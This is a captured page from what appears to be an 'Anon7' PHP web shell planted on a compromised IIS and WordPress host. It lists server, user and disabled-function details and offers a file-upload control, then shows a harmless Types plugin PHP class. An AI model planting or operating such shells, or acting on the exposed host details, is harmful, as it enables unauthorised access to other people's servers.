GIF89A; .
KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Microsoft-IIS/10.0
System : Windows NT HMW9050 6.2 build 9200 (Unknow Windows version Standard Edition) i586
User : fatorc ( 0)
PHP Version : 5.3.28
Disable Function : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell_exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, link, openlog, apache_child_terminate
Directory :  e:/home/fatorc/Web/wp-content/plugins/types/application/models/helper/condition/type/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : e:/home/fatorc/Web/wp-content/plugins/types/application/models/helper/condition/type/fields_assigned.php
<?php

class Types_Helper_Condition_Type_Fields_Assigned extends Types_Helper_Condition {

	public function valid() {
		$post_type = Types_Helper_Condition::get_post_type();

		// false if we have no post type
		if( ! isset( $post_type->name ) )
			return false;

		// query a post
		$query = new WP_Query( 'post_type=' . $post_type->name . '&posts_per_page=1' );

		if( $query->have_posts() ) {
			$post = $query->posts[0];
			
		// for the case no post created yet (post fields group edit page / post type edit page)
		} else {
			$post = new stdClass();
			$post->ID = -1;
			$post->post_type = $post_type->name;
		}

		if( !function_exists( 'wpcf_admin_post_get_post_groups_fields') )
			include_once( WPCF_EMBEDDED_ABSPATH . '/includes/fields-post.php' );

		$fields = wpcf_admin_post_get_post_groups_fields( $post );

		if(
			isset( $fields )
			&& is_array( $fields )
		    && !empty( $fields )
		) return true;

		return false;
	}
}

Anon7 - 2021